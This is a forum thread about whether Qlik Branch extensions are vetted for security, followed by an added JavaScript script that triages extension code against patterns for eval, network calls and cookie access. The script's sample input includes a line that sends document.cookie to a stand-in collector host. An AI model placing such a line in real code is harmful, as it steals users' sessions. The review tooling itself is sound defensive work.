
Qlik Branch Extension Security/Verification

Does Qlik verify the contributions or projects on Qlik Branch? If not, is there a way for Qlik users to certify that particular extensions are safe or do not have glaring vulnerabilities? Some of our clients are concerned about allowing unverified third-party JavaScript packages to run on their servers.

Thanks in advance.

Cheers,

Andrew

3 Replies
Not applicable
Author

Branch content is completely open source and so under the same evaluation of the open source community. Read the source code carefully and when in doubt, don't use it.

swuehl
MVP

Maybe also have a look at Alexander's comment here:

Can extensions carry security risk? | Qlik Community

Alexander_Thor
Employee

Hey Andrew,

As the other poster stated, I would recommend _everyone_ to verify the source code on their own.

You wouldn't copy / paste a load script from a page on the internet into your app and the same rule of thumb should go for Extensions.

Now with that said, since extensions are just normal objects, the usual section access and security rules apply, so an extension can't access anything apart from what the user is allowed to see. We also do checks for click-jacking and obvious malicious code for the projects posted on Branch.
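
A first-pass triage that could precede the manual source review recommended in this thread, as an added example that is not part of the original posts and not a Qlik tool: it flags lines in an extension's JavaScript that deserve a close read. The rule list, the `triage` function and the sample files are assumptions constructed for illustration, and an empty result does not replace reading the code.

```javascript
// Added example: first-pass triage of extension JavaScript before a manual review.
// The rules are illustrative assumptions, not Qlik's own Branch checks.
const RULES = [
  { id: 'dynamic-eval', re: /\beval\s*\(|\bnew\s+Function\s*\(/, why: 'runs code built at runtime' },
  { id: 'timer-string', re: /\bset(?:Timeout|Interval)\s*\(\s*['"`]/, why: 'string argument is evaluated as code' },
  { id: 'network-call', re: /\bfetch\s*\(|\bXMLHttpRequest\b|\$\.(?:ajax|get|post|getJSON)\s*\(|\bWebSocket\s*\(|\bsendBeacon\s*\(/, why: 'can send data to another host' },
  { id: 'remote-url', re: /\bhttps?:\/\/[^\s'"`)]+/, why: 'hard-coded external endpoint' },
  { id: 'dom-injection', re: /\.innerHTML\s*=|\bdocument\.write\s*\(|\.insertAdjacentHTML\s*\(/, why: 'HTML sink, check that data is escaped' },
  { id: 'decode-blob', re: /\batob\s*\(|\bunescape\s*\(|\bString\.fromCharCode\s*\(/, why: 'may hide an encoded payload' },
  { id: 'client-state', re: /\bdocument\.cookie\b|\b(?:local|session)Storage\b/, why: 'reads cookies or stored data' },
];
const MAX_LINE = 2000; // longer lines suggest minified or packed code that cannot be reviewed as-is

// files: { name: sourceText }. Returns one finding per (line, rule) hit, in file and line order.
function triage(files) {
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    source.split(/\r?\n/).forEach((text, i) => {
      const hit = (rule, why) => findings.push({ file, line: i + 1, rule, why, text: text.trim().slice(0, 100) });
      for (const r of RULES) if (r.re.test(text)) hit(r.id, r.why);
      if (text.length > MAX_LINE) hit('unreviewable-line', 'minified or packed, ask for readable source');
    });
  }
  return findings;
}

// Constructed sample input standing in for an extension's files (not a real project).
const SAMPLE = {
  'chart.js': [
    "define(['jquery'], function ($) {",
    "  return { paint: function ($element, layout) {",
    "    $element[0].innerHTML = layout.title;",
    "    fetch('https://collector.example/log?d=' + document.cookie);",
    "  } };",
    "});",
  ].join('\n'),
  'clean.js': "define([], function () { return { paint: function () {} }; });",
};

for (const f of triage(SAMPLE)) console.log(`${f.file}:${f.line} [${f.rule}] ${f.why}`);
```

Each finding is a pointer for the reviewer, not a verdict: a charting extension may legitimately write to `innerHTML`, and the question to answer by reading the code is where the data comes from and where it goes.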